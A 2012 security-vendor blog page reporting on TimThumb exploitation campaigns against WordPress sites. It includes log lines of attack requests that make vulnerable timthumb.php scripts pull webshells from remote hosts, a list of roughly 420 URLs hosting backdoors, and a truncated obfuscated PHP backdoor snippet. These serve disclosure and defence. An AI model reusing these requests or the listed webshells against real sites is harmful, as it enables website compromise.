• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

List of Domains Hosting Webshells for Timthumb Attacks

May 31, 2012Daniel Cid

FacebookTwitterSubscribe

We have been tracking TimThumb related attacks for a while and they are still at full force (yes, some people are still using the outdated versions and getting compromised).

Just for the month of May, we identified more than 400 domains hosting backdoors for those type of attacks and a botnet with more than 1,000 IP addresses scanning sites that might be vulnerable to it.

If you like to look at your logs, that’s how it would look like:

216.227.214.242 – – [31/May/2012:03:55:35 +0000] “GET /wp-content/themes/vibrantcms/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1” 404 9347 “-” “”

or

112.78.3.167 – – [31/May/2012:03:45:50 +0000] “GET //wp-content/themes/Quadro/timthumb.php?src=http://img.youtube.com.spectra-entertainment.com/upload.php HTTP/1.1” 404 305 “-” “”

Basically searching for hundreds of themes per site that could have the old timthumb.php enabled and attempting to insert the backdoors from http://img.youtube.com.spectra-entertainment.com/upload.php and http://blogger.com.nilgirisrealty.com/cok.php on it.

The full list of domains hosting the backdoor is on our labs post:

List of domains hosting webshells for Timthumb attacks

and the list of IP addresses there too:

List of IP addresses scanning for vulnerable timthumb .

FacebookTwitterSubscribe

Categories: Vulnerability Disclosure, Website Malware Infections, WordPress SecurityTags: Malware Updates

About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Reader Interactions

Comments

  1. Guest

    May 31, 2012

    Okay, one of my server’s IP is listed and it belongs to a shared hosting server. I can find numerous logs with hits from other IPs and its own….

    This might be a stupid question… but how do I track down the webshell script that is scanning? 

    • Peter Abraham

      May 31, 2012

      http://www.rfxn.com/projects/linux-malware-detect/ does a reasonable job.  If you are comfortable with Clam Anti-Virus, turn on the ability to detect possible unwanted applications (PUA) and scan with Clam Anti-Virus.

      Spot checking directories that malware likes to hide in such as /tmp, /var/tmp, /dev/shm and the like can often end up finding the malware.

      In terms of end user sites, pay careful attention to any directory with 777 permissions or any files with >= 666 permissions or files and folders owned by the web server (i.e. httpd / apache/ nobody).

      And… you can always hire Sucuri to help you.

  2. Peter Abraham

    May 31, 2012

    Great work!  I wrote http://www.dynamicnet.net/2012/05/linux-techniques-sucuri-labs/ with the hope to encourage security and system admins to benefit from your work.

List of domains hosting webshells for Timthumb attacks

May 28, 2012Daniel Cid

FacebookTwitterSubscribe

We have been tracking timthumb.php related attacks for a little while. And they arestill at full force. Just for the month of May, tohse are the domains we identified hostingbackdoors that were used by the attackers (420 different urls).

http://46.166.135.177/id.php
http://bibliotecaie.cinvestav.mx//wp-content/uploads/index.php
http://bizboy.org/fly/x.php
http://blogger.com.3085.a.hostable.me/myid.php
http://blogger.com.3mrdes.com/sh.php
http://blogger.com.3mrdes.com/xx.php
http://blogger.com.44.lt/tim.php
http://blogger.com.accc.org.nz/alapyu.php
http://blogger.com.aceaswift.com/content/xcyb.php
http://blogger.com.administratordebloc.ro/mct.dm
http://blogger.com.administratordebloc.ro/mct.php
http://blogger.com.antarticachilena.cl/bot.php
http://blogger.com.antarticachilena.cl/sh.php
http://blogger.com.antarticachilena.cl/xx.php
http://blogger.com.apsidoarjo.ac.id/text/up2.php
http://blogger.com.arreglandoelpais.net/sh.php
http://blogger.com.arreglandoelpais.net/xx.php
http://blogger.com.artclinic.com.br/sh.php
http://blogger.com.artclinic.com.br/xx.php
http://blogger.com.avisameinmobiliarias.es/jb.php
http://blogger.com.avisameinmobiliarias.es/sh.php
http://blogger.com.avisameinmobiliarias.es/xx.php
http://blogger.com.bookoftheweek.org/pl.php
http://blogger.com.brinquedosdebuffetinfantil.com.br/wp.php
http://blogger.com.carnivalcostumesonline.com/404.php
http://blogger.com.carnivalcostumesonline.com/bot.php
http://blogger.com.carnivalcostumesonline.com/sp.php
http://blogger.com.carnivalcostumesonline.com/xx.php
http://blogger.com.catholicphoto.org/bbs/data/gallerym2/1216040404/soul.gif??
http://blogger.com.cbcames.org/wp-content/blogs.dir/11/upload.gif
http://blogger.com.comuricazione.it/bot/xx.php
http://blogger.com.comuricazione.it/pl.php
http://blogger.com.conexaofama.com.br/config.inc.php
http://blogger.com.coyotescumbres.com/bot.php
http://blogger.com.coyotescumbres.com/sh.php
http://blogger.com.coyotescumbres.com/xx.php
http://blogger.com.crappyfiles.com/image.php
http://blogger.com.crediyasa.com/content/tes.php
http://blogger.com.dirigent.jp/gringo.php
http://blogger.com.diversystem.com.br/sh.php
http://blogger.com.diversystem.com.br/xx.php
http://blogger.com.djnick-mcgiany.com/ds.php
http://blogger.com.djnick-mcgiany.com/mct.php
http://blogger.com.dlh-digital.com/cox.php
http://blogger.com.edchaoimage.com/db.php
http://blogger.com.elicina-id.com/injekan.php
http://blogger.com.elicina-id.com/iprobot.php
http://blogger.com.el-manhal.com/mods/sh.php
http://blogger.com.expressacred.com/bot.php
http://blogger.com.expressacred.com/sh.php
http://blogger.com.expressacred.com/xx.php
http://blogger.com.fairnesstips.com/sh.php
http://blogger.com.fairnesstips.com/xx.php
http://blogger.com.fehrmanns.com/cok.php
http://blogger.com.gamag.co.za/sh.php
http://blogger.com.gamag.co.za/xx.php
http://blogger.com.hitechcomputerservice.com/jb.php
http://blogger.com.hitechcomputerservice.com/sh.php
http://blogger.com.hitechcomputerservice.com/xx.php
http://blogger.com.holidaygallery.net/x3.php
http://blogger.com.iglesembalagens.com.br/blog/wp-config.php
http://blogger.com.iglesembalagens.com.br/blog/wp-login.php
http://blogger.com.itu-innovators.dk/sh.php
http://blogger.com.itu-innovators.dk/xx.php
http://blogger.com.johelmonte.pt/cgi/info.php
http://blogger.com.katrecan.com/sema.php
http://blogger.com.kforkent.com/shell.php
http://blogger.com.liceo10.edu.uy/sh.php
http://blogger.com.liceo10.edu.uy/xx.php
http://blogger.com.lochin.org/both.php
http://blogger.com.lochin.org/lin.php
http://blogger.com.lochin.org/nina.php
http://blogger.com.lochin.org/user.php
http://blogger.com.lunaazulstudio.com/log.php
http://blogger.com.mesco.com.vn/ikhy.php
http://blogger.com.mesco.com.vn/login.php
http://blogger.community.capedrium-campus.fr/wp.php
http://blogger.community.cherryontop.dk/1.php
http://blogger.community.eccspl.com.br/2.php
http://blogger.community.ramil.cl/2.php
http://blogger.community.transpackchile.com/2.php
http://blogger.com.musikgratisan.com/stun.php
http://blogger.com.narasopamedia.com/italy.php
http://blogger.com.narenlive.com/songs/phantom.php
http://blogger.com.newbuysellrealestate.com/404.php
http://blogger.com.newbuysellrealestate.com/bot.php
http://blogger.com.newbuysellrealestate.com/sp.php
http://blogger.com.newbuysellrealestate.com/xx.php
http://blogger.com.nooma.co.za/sh.php
http://blogger.com.nooma.co.za/xx.php
http://blogger.com.objetivatelemarketing.com.br/sh.php
http://blogger.com.objetivatelemarketing.com.br/xx.php
http://blogger.com.odontomix.com/sh.php
http://blogger.com.odontomix.com/xx.php
http://blogger.com.ongcatavento.org/index.php
http://blogger.com.orquestagalatea.com/sh.php
http://blogger.com.orquestagalatea.com/xx.php
http://blogger.com.pansoftds.com/sh.php
http://blogger.com.pansoftds.com/xx.php
http://blogger.com.perbovbjerg.dk/sh.php
http://blogger.com.perbovbjerg.dk/xx.php
http://blogger.com.pisciculturanovaera.com.br/sh.php
http://blogger.com.pisciculturanovaera.com.br/xx.php
http://blogger.com.plainlanddental.com.au/injekan.php
http://blogger.com.plainlanddental.com.au/jack.php
http://blogger.com.pnwhi.com/both.php
http://blogger.com.pnwhi.com/lin.php
http://blogger.com.pnwhi.com/nina.php
http://blogger.com.pnwhi.com/user.php
http://blogger.com.poopswa.asn.au/bot.php
http://blogger.com.poopswa.asn.au/sh.php
http://blogger.com.poopswa.asn.au/xx.php
http://blogger.com.portalconcilia.com/404.php
http://blogger.com.positiveblackmencoalition.com/cok.php
http://blogger.com.rickotton.com/injekan.php
http://blogger.com.rickotton.com/probot.php
http://blogger.com.sienbity.com/force.php
http://blogger.com.spectra-entertainment.com/z.php
http://blogger.com.stiabanten.ac.id/text/up2.php
http://blogger.com.sue-darlison-furniture.co.uk/bot.php
http://blogger.com.sue-darlison-furniture.co.uk/sh.php
http://blogger.com.sue-darlison-furniture.co.uk/xx.php
http://blogger.com.teenytottiles.com/cilik.php
http://blogger.com.termasdelpizarro.com.ar/xx.php
http://blogger.com.tfbonline.com/injekan.php
http://blogger.com.thinkgadgets.co.cc/stunshell.php
http://blogger.com.thistledoo.co.za/sh.php
http://blogger.com.thistledoo.co.za/xx.php
http://blogger.com.touchadjustclip.com/my.php
http://blogger.com.trigger.ro/jb.php
http://blogger.com.trigger.ro/sh.php
http://blogger.com.trigger.ro/xx.php
http://blogger.com.triptoworld.net/cox.php
http://blogger.com.uangotomatic.com/injekan.php
http://blogger.com.vietnamtours.pikachu.webchuyennghiep.net/image.php
http://blogger.com.vocesdelaesperanza.com/shell.php
http://blogger.com.vulnweb.com/F5JXrZ5W.php
http://blogger.com.vulnweb.com/iCXEdWYq.php
http://blogger.com.vulnweb.com/IYx4wRAO.php
http://blogger.com.vulnweb.com/KjP91sei.php
http://blogger.com.vulnweb.com/ksmaXJQj.php
http://blogger.com.vulnweb.com/kTqnAb2I.php
http://blogger.com.vulnweb.com/l5epyeeQ.php
http://blogger.com.vulnweb.com/lDCbz391.php
http://blogger.com.vulnweb.com/lMAe6dgc.php
http://blogger.com.vulnweb.com/NlcwEscw.php
http://blogger.com.vulnweb.com/nNyN4d0y.php
http://blogger.com.vulnweb.com/pLWIlDWJ.php
http://blogger.com.vulnweb.com/Q7skzwIL.php
http://blogger.com.vulnweb.com/QfZg3mqN.php
http://blogger.com.vulnweb.com/rfhwU63i.php
http://blogger.com.vulnweb.com/s07QnyPf.php
http://blogger.com.vulnweb.com/U7CuV56t.php
http://blogger.com.vulnweb.com/v7AAQOPr.php
http://blogger.com.vulnweb.com/VbsekdJK.php
http://blogger.com.vulnweb.com/vwFIWscT.php
http://blogger.com.vulnweb.com/WGXoOyRA.php
http://blogger.com.vulnweb.com/XkBoWHXX.php
http://blogger.com.vulnweb.com/yi7jaMb1.php
http://blogger.com.webbmotellet.se/count.php
http://caritasamersfoort.nl//wp-content/themes/themorningafter/cache/ikhy.php
http://caritasamersfoort.nl//wp-content/themes/themorningafter/cache/login.php
http://cmafreewebsites.com/showcase/newspresssite//wp-content/themes/newspress/cache/LC.php
http://discoveryengine.com/discobot.html)"
http://dubsmugglers.com/test/injector/asu/ikhy.php
http://dubsmugglers.com/test/injector/asu/login.php
http://durossdesign.com/img/css/lks/xcyb
http://firstcoastmultimedia.com/owa/login.php
http://flickr.com.administratordebloc.ro/dm.php
http://flickr.com.administratordebloc.ro/mct.php
http://flickr.com.arc-atmajaya.org/config.inc.php
http://flickr.com.asimare.com.br/alapyu.php
http://flickr.com.bpmohio.com/bad.php
http://flickr.com.bpmohio.com/load.php
http://flickr.comcrews.azuka.biz/bb.jpg
http://flickr.comcrews.azuka.biz/crew.php
http://flickr.com.danieljr.com.br/bot.php
http://flickr.com.danieljr.com.br/sh.php
http://flickr.com.danieljr.com.br/xx.php
http://flickr.com.levelfs.com/dmm.php
http://flickr.com.levelfs.com/mct.php
http://flickr.com.losvideosmasvistos.net/content/png.php
http://flickr.com.maispatos.com.br/content/gif.php
http://flickr.com.maispatos.com.br/content/png.php
http://flickr.com.miletus.es/content/png.php
http://flickr.com.mmonlinefashions.com/bot.php
http://flickr.com.mmonlinefashions.com/sh.php
http://flickr.com.mmonlinefashions.com/xx.php
http://flickr.com.musicui.com/bot.php
http://flickr.com.musicui.com/sh.php
http://flickr.com.musicui.com/xx.php
http://flickr.com.orlandobulletin.com/perl.php
http://flickr.com.ps-x.us.to/content/gif.php
http://flickr.com.simplysensationaleventsandcatering.com/bot.php
http://flickr.com.simplysensationaleventsandcatering.com/sh.php
http://flickr.com.simplysensationaleventsandcatering.com/xx.php
http://flickr.com.trdod.com/login.php
http://flickr.com.vialivredourados.com.br/content/content.php
http://flickr.com.vialivredourados.com.br/content/lib.php
http://flickr.com.web.77wallstreet.com/content/gif.php
http://img.youtube.com.99ves.com/yahoo.php
http://img.youtube.com.amc-pk.com/harie.php
http://img.youtube.com.badogcnc.com/juv.php
http://img.youtube.com.cr3ativiz.web.id/index.php
http://img.youtube.com.crediyasa.com/content/img.php
http://img.youtube.com.d2drumline.com/juv.php
http://img.youtube.com.fdefausto.com/bot/xx.php
http://img.youtube.com.grinis.com/upload.php
http://img.youtube.com.imworldclass.com/perasaan.php
http://img.youtube.com.junglerumblepartyvenue.co.za/antisux.php
http://img.youtube.com.lacolmenagroup.com.ar/inc.php
http://img.youtube.com.mumsandbabes.com.my/txt/upload.php
http://img.youtube.com.muzeumi.itdc.ge/view.php
http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php
http://img.youtube.com.n0why.us/wp-content/themes/ultimateblogger/images/teddy/teddy/teddy.php
http://img.youtube.com.n0why.us/wp-includes/teddy/teddy.php
http://img.youtube.com.naapsse.com/perasaan.php
http://img.youtube.com.prodajpricu.com/antisux.php
http://img.youtube.com.prodajpricu.com/index.php
http://img.youtube.com.prodajpricu.com/youtube.php
http://img.youtube.com.spectra-entertainment.com/upload.php
http://img.youtube.com.urix.cl/index.php
http://img.youtube.grinis.com/upload.php
http://israbridge.com/blogger.com/cox.php
http://jiffyvoice.com//wp-content/themes/PersonalPress/cache/34e3a3a74f6e2d0f236bdd3ba70c0c03.php
http://knigidecada.net//wp-content/themes/Cion/cache/1.php?act=f&f=ikhy.php
http://knigidecada.net//wp-content/themes/Cion/cache/1.php?act=f&f=login.php
http://livinginrwanda.com/chat/bss.txt
http://orangepen.ro/css/htacess.php
http://picasa.com.adelbacau.ro/sing.php
http://picasa.com.alfurqantutor.com/logs/logs.php
http://picasa.com.alfurqantutor.com/logs/uname.php
http://picasa.com.amc-pk.com/harie.php
http://picasa.com.atlantamedicalinstitute.com/login.php
http://picasa.com.banigualdad.cl/cybercrime.php
http://picasa.com.bargierihost.com/cok.php
http://picasa.com.boardgamegear.com/ho1onk.php
http://picasa.combo.lexiesplanet.com/tim.php
http://picasa.combos.orgasmguide.org/byroe.php
http://picasa.com.bptpastairegarden.com/cybercrime.php
http://picasa.com.builtmotion.com/hsdv/hsdv.php
http://picasa.com.bullsharkdivers.com/decode.php
http://picasa.com.bullsharkdivers.com/kalumba.php
http://picasa.com.castlefan.org/cok.php
http://picasa.com.conexaofama.com.br/config.php
http://picasa.com.cozinhadagloria.com.br/cybercrime.php
http://picasa.com.cr3ativiz.web.id/timthumb.php
http://picasa.com.csbhost.com/spread.php
http://picasa.com.csbhost.com/w00t.php
http://picasa.com.daimonionarts.com/a/x.php
http://picasa.com.daimonionarts.com/x.php
http://picasa.com.debateandreview.com/injektor.php
http://picasa.com.devonportchurches.org.au/simple.php
http://picasa.com.di-squad.com/module.php
http://picasa.com.djnick-mcgiany.com/dmm.php
http://picasa.com.djnick-mcgiany.com/dm.php
http://picasa.com.djnick-mcgiany.com/mct.php
http://picasa.com.ds.tl/wp-content/php/words/b1.php
http://picasa.com.edicionesdidactikids.cl/bob.php
http://picasa.com.edicionesdidactikids.cl/count.php
http://picasa.com.eroslighting.com.au/injektor/injektor.php
http://picasa.com.esalli.com/login.php
http://picasa.com.evolution-store.net/config.inc.php
http://picasa.com.fairnesstips.com/yahoo.php
http://picasa.com.familiaydesarrollo.org/config.inc.php
http://picasa.com.fostering.in/ikhy.php
http://picasa.com.friv-juegos.co/apache/b1.php
http://picasa.com.fsquaredmedia.com/no2.php
http://picasa.com.greenhallway.ca/cok.php
http://picasa.com.hackz.name/1/m.php
http://picasa.com.hackz.name/god.php
http://picasa.com.hackz.name/lol.php
http://picasa.com.hackz.name/mafia.php
http://picasa.com.healthierlifeplan.com/login.php
http://picasa.com.hidro-ronda.com/both.php
http://picasa.com.hidro-ronda.com/lin.php
http://picasa.com.hidro-ronda.com/nina.php
http://picasa.com.hidro-ronda.com/user.php
http://picasa.com.ipsupply.com.au/wp-content/uploads/2011/12/chase/b1.php
http://picasa.com.ipsupply.com.au/wp-content/uploads/2012/03/IN.php
http://picasa.com.ipsupply.com.au/wp-content/uploads/2012/03/load.php
http://picasa.com.itspj.com/cybercrime.php
http://picasa.com.jcibuenosaires.com.ar/2.php
http://picasa.com.kereny.ro/go.php
http://picasa.com.kereny.ro/x.php
http://picasa.com.kiditect.com/pl.php
http://picasa.com.klik4free.net/File/w00t.php
http://picasa.com.marathmola.com/cok.php
http://picasa.com.montroyalautobus.com/yahoo.php
http://picasa.com.moveissantafe.com/yahoo.php
http://picasa.communication.fees.cl/2.php
http://picasa.communication.mintweb.dk/2.php
http://picasa.communication.mushindojo-bistrita.ro/wp.php
http://picasa.communication.ventasexclusivas.cl/2.php
http://picasa.com.nieca.com/rabot.php
http://picasa.com.pakarwebsite.com/xpl/yahoo.php
http://picasa.com.playteck.net/spread.php
http://picasa.com.portobello.com.au/cybercrime.php
http://picasa.com.portobello.com.au/phantom.php
http://picasa.com.prisonbucket.com/itel.php
http://picasa.com.prodajpricu.com/index.php
http://picasa.com.reginaalcalde.cl/contents/bob.php
http://picasa.com.reginaalcalde.cl/contents/count.php
http://picasa.com.sharmilas.co.uk/pl.php
http://picasa.com.sigeart.com/wp-content/images/soul.php
http://picasa.comsing.nazuka.net/sing.php
http://picasa.com.snap-u.com/yahoo.php
http://picasa.com.toldgomes.pt/both.php
http://picasa.com.toldgomes.pt/nina.php
http://picasa.com.toldgomes.pt/nin.php
http://picasa.com.tomi.com.au/logs/404.php
http://picasa.com.tomi.com.au/logs/kacuk.php
http://picasa.com.tomi.com.au/logs/shell.php
http://picasa.com.tomi.com.au/logs/xcyb.php
http://picasa.com.truephenomenon.com/cybercrime.php
http://picasa.com.urix.cl/cgi-bin.php
http://picasa.com.uslulaw.com/menu.php
http://picasa.com.utalent.org/itel.php
http://picasa.com.utalent.org/service/hsdv.php
http://picasa.com.webbmotellet.se/count.php
http://picasa.com.welitonmaia.com.br/bot.php
http://picasa.com.welitonmaia.com.br/sh.php
http://picasa.com.welitonmaia.com.br/xx.php
http://picasa.com.wesmira.com/injekan.php
http://picasa.com.xpl.be/yahoo.php
http://picasa.com.yenisahne.com/cybercrime.php
http://picasa.com.zlinkerparts.com/yahoo.php
http://picasa.dairi-online.org/ho1onk.php
http://pitfoto.eu/wp-content/themes/kingsize/images/gallery/login.php
http://procmocoescielo.com.br/timthumb/ikhy.php
http://procmocoescielo.com.br/timthumb/login.php
http://shinnongclinic.com/kor_board/icon/member_image_box/1/pl.php
http://tokokuepondokhijau.com/wp-admin/js/ikhy.php
http://tokokuepondokhijau.com/wp-admin/js/login.php
http://womenmagazine.pp.ua//read.php
http://wordpress.com.acadteam.com/eva.php
http://wordpress.com.airatrip.com/temp/dapetsatu.php
http://wordpress.com.airatrip.com/temp/icon.php
http://wordpress.com.airatrip.com/temp/phantom.php
http://wordpress.com.cctvnoida.in/cache.php
http://wordpress.com.cobrerodas.com.br/wp-reson.php
http://wordpress.com.defacer007.tk/juned.php
http://wordpress.com.defacer007.tk/junedz.php
http://wordpress.com.en-nur.at/injekan.php
http://wordpress.com.en-nur.at/probot.php
http://wordpress.com.framarservices.com/ecommerce/imp/userfiles/mods/sh.php
http://wordpress.com.hostdail.com/bot.php
http://wordpress.com.hostdail.com/logs/logs.php
http://wordpress.com.junglerumblepartyvenue.co.za/index.php
http://wordpress.company.clubmarutichile.cl/2.php
http://wordpress.company.draadrianacampos.com.br/2.php
http://wordpress.company.newconstructionadvice.com/2.php
http://wordpress.company.provinciadelhuasco.cl/2.php
http://wordpress.company.smiledesignofutah.com/wp.php
http://wordpress.company.veterangalleri.dk/3.php
http://wordpress.com.prolinkirc.org/index6.php
http://wordpress.com.quick-life.com/bot.php
http://wordpress.com.shootarget.com/eva.php
http://wordpress.com.sleepyvillage.ca/indeks.php
http://wordpress.com.xanapa.au.com/xanyn.php
http://wordpress.com.xanyko.in/xanyn.php
http://www.antiguadecor.com/livehelp/include/count.php
http://www.beachsoccerzeeland.nl/nitrouse/clear-all.php
http://www.bikinisnz.com/ikhy.php
http://www.bikinisnz.com/login.php
http://www.blogger.com.exl.ro/max/login.php
http://www.comositas.com/wp/asu/ikhy.php
http://www.comositas.com/wp/asu/login.php
http://www.computationalcenter.com.ar/images/google/ikhy.php
http://www.computationalcenter.com.ar/images/google/login.php
http://www.diendanceo.vn/diendan.matbaoad.com/logs.jpg
http://www.edermeneghine.com.br/consultoria///wp-admin/images/css/admin-bar.dev.css
http://www.effectuslifestyle.com//wp-admin/logs/auto
http://www.flickr.com.katiechaophoto.com/htacess.php
http://www.flickr.com.querominhalojananet.com.br/htacess.php
http://www.flickr.com.turuzzonatale.it/htacess.php
http://www.hizb.org.uk/mint/ikhy.php
http://www.hizb.org.uk/mint/login.php
http://www.jayneskitschen.co.uk/blog/tmp/cache/linkshell.txt?
http://www.kinecat.pl/shx
http://www.picasa.com.borgonicoletta.it/silet.php
http://www.picasa.com.ekoproject.it/yamaha.php
http://www.picasa.com.theblueoblique.com/eat.php
http://www.picasa.com.tunc.tk/malas.php
http://www.poppylou.com.au/spread.php
http://www.prosnow.pl/wp-includes/xhtml/query.php
http://www.prosnow.pl/wp-includes/xhtml/quota.php
http://www.purplepeppa.co.uk/cart/images/byroe.php
http://www.seoulaoi.com/bbs/icon/Home/load.php
http://www.wendyswebpagedesign.com/wp-admin/maint/numpang/ikhy.php
http://www.wendyswebpagedesign.com/wp-admin/maint/numpang/login.php

And most of them are still live. If you download them you will see many backdoor variations:

if (isset($lol)) { eval ( gzinflate(base64_decode("pZJda8IwFIbvB/sPMQhNQMR9XM05Cvsbg1DTE5vRJiEnnRbxvy9Jre5C8GJ35f143kMoyMYS+rNyn/5l/771H3T9+ABZxAHf6NI1TvSm6oDxJZ0Cc9nVG5pjxm5X9ZDa2QCEXa+TDQeWYnziXa2oqN7IoK0hOaWAH2PXA5INKYroa0XYDDoXhtFOvlZsqgk4aAzICjiALLJbps8cXiRQmj0Dv602jH4ZejFO8aQW4RYQG2hbccWeGeVVHw+6QxkwQHc+zG4FhsoHlkrlaF0gEz+GdhCEtCaAiYicjSKYWsgWKsPuTLoKMTS+vzk6mf+eLTWKWLW9l8DmKiGcdWDGh6ee8r+vRtMvsW90C2xWKrAqVjgnR5L9ZSwrD1Ud1cXT6vmVr8kpHStbi4mep6PiIfTe..

And we will keep monitoring them.

FacebookTwitterSubscribe

Categories: Uncategorized

About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.